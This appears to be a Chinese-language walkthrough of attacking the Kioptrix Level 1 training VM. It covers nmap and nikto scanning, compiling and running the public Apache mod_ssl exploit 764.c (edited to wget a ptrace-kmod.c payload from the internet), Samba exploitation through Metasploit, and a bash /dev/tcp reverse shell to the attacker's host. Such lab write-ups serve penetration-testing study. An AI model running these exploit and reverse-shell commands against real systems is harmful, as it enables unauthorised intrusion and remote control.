Kioptrix Level 1靶机渗透
2021-03-14 本文已影响0人
Conn606
一、kali nmap 发现主机
1.用namp扫描c段 没发现主机
![](https://img.haomeiwen.com/i24738678/3cf11e70e1d903b0.png)
解决办法 :
(1):打开靶机所在文件夹,找到vmx后缀的文件并打开
![](https://img.haomeiwen.com/i24738678/a1033ce9c87062dd.png)
(2):将Bridged全部改成nat(默认是桥接模式,因为kali是nat才能扫描IP)
![](https://img.haomeiwen.com/i24738678/1651c3ca70dd8d9e.png)
![](https://img.haomeiwen.com/i24738678/a8a27130a78f9fb8.png)
2.识别到主机IP为192.168.65.134
![](https://img.haomeiwen.com/i24738678/38e1af033e4957c4.png)
3.端口扫描,发现开放了80、22、111、139、443、1024端口
![](https://img.haomeiwen.com/i24738678/c3eec8d304d8d6f7.png)
![](https://img.haomeiwen.com/i24738678/5ae476d2076807c9.png)
4.nikto目录扫描
![](https://img.haomeiwen.com/i24738678/b76615167d1d33ad.png)
二、漏洞利用之apache
1.搜索apache 1.3.20版本漏洞
![](https://img.haomeiwen.com/i24738678/68eee3950d41d792.png)
2.编译执行漏洞
![](https://img.haomeiwen.com/i24738678/bff5df587d5fd126.png)
- 发现编译764.c失败,解决办法如下:
- 安装libssl,命令
sudo apt-get install libssl1.0-dev
![]()
- 在头文件添加
#include <openssl/rc4.h> #include <openssl/md5.h>
![]()
- 将#define COMMAND2,wget后面的URL修改为https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
![]()
- 将unsigned char *p, *end前添加const
![]()
5.在kali编译成功
gcc -o okk 764.c -lcrypto
![]()
- 执行漏洞成功
./okk 0x6b 192.168.65.134 -c 40
![]()
![]()
三、漏洞利用之Samba
1.信息收集发现主机139端口安装了samba,版本为Samba 2.2.1a
![](https://img.haomeiwen.com/i24738678/48158c8a16eba5ca.png)
![](https://img.haomeiwen.com/i24738678/7980615357bcbde5.png)
2.直接msf搜索samba
![](https://img.haomeiwen.com/i24738678/be40de249ca664b7.png)
3.漏洞利用提权
![](https://img.haomeiwen.com/i24738678/66d679a9ded953b1.png)
4.nc反弹shell
1.kali nc监听端口
nc -lvvp 1234
![]()
2.反弹shell
bash -i >& /dev/tcp/192.168.65.129/1234 0>&1
(192.168.65.129是kali主机的ip,不是靶机的ip)![]()
3.反弹成功![]()